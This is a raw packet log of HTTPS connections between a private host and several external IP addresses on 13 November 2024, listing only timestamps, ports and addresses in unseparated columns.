                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.071333885 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.095333099 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.101428032 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.101492882 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.132273912 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.132354975 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.132464886 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.132780075 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.132817030 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.148648024 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191170931 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191401958 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191426992 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191498041 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191508055 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.191553116 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.192334890 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.192356110 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.192708969 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.192735910 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.192814112 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.193172932 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.193191051 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.193635941 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.193645000 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.193742037 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.194283009 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.194309950 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.194623947 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.194637060 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.197022915 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.197487116 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.197550058 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.197864056 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.197875977 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198390007 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198409081 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198468924 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198782921 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198796034 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.198883057 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.199095011 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.199103117 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.200180054 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.200242996 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.201147079 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.201206923 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.201302052 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.201311111 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.220377922 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.220446110 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.220524073 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221190929 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221255064 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221376896 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221410990 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221515894 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221829891 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.221846104 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.243848085 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.605585098 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.605875969 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.605941057 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.606973886 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.607048035 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.607362032 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.607429028 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.607589960 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.610332966 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.610579014 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.610594988 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.611609936 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.611681938 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.611955881 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.612019062 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.612092018 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.612112045 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.655335903 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.656644106 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.656677008 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.657820940 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.702636003 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.771997929 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.772423983 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.772712946 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.773124933 CET49755443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.773169041 CET44349755162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.773591995 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.773619890 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.773705959 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.774333000 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.774348974 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.782190084 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.782483101 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.782737970 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.782915115 CET49753443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.782927990 CET44349753162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.876883984 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.876924038 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.877008915 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.877208948 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.877223969 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.892138958 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.892441988 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.892462969 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.892838955 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.893038034 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.893477917 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.893546104 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.893644094 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.894143105 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.894416094 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.894444942 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.894932032 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.895405054 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.895533085 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.895634890 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.900904894 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.901138067 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.901148081 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.902414083 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.902689934 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.902712107 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.902959108 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903022051 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903338909 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903414011 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903475046 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903481007 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903870106 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.903947115 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.904175043 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.904264927 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.904299021 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.935333967 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.939776897 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.943336964 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.947343111 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.955637932 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.955656052 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.955661058 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.976963997 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.977051020 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.978168964 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.978185892 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.978446960 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.979583025 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.003654003 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.027337074 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.065531969 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.065620899 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.065682888 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.066567898 CET49779443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.066595078 CET44349779162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.067373991 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.067600012 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.067679882 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.070832968 CET49780443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.070849895 CET44349780162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.071501970 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.071795940 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.071907997 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.071943045 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.072304964 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.072356939 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.073421955 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.073481083 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.073843002 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.073921919 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.073935032 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.074728012 CET49784443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.074743032 CET44349784162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.077944040 CET49781443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.077961922 CET44349781162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.079217911 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.079267025 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.079340935 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.079746008 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.079776049 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.116319895 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.116398096 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.116470098 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.116677046 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.116713047 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.193634033 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.223788023 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.223848104 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.223934889 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.257648945 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.310343981 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.310353041 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.310365915 CET49770443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.310372114 CET44349770184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.455517054 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.455842018 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.455853939 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.456197977 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.456792116 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.456852913 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.456960917 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.499335051 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.629328012 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.629394054 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.630394936 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.635565996 CET49796443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.635584116 CET44349796162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.723776102 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.724589109 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.724616051 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.726824999 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.726881027 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.728220940 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.728302002 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.728434086 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.728492022 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.728499889 CET4434979966.235.152.156192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.783749104 CET49799443192.168.2.1766.235.152.156
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.799606085 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.944943905 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.945357084 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.945386887 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.946625948 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.946686983 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.947153091 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.947227955 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.947360039 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.947370052 CET4434980099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.979341984 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.980191946 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.980211020 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.981708050 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.981785059 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.983740091 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.983814001 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.984051943 CET49801443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.984075069 CET4434980199.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.986671925 CET49800443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.987085104 CET4434979966.235.152.156192.168.2.17
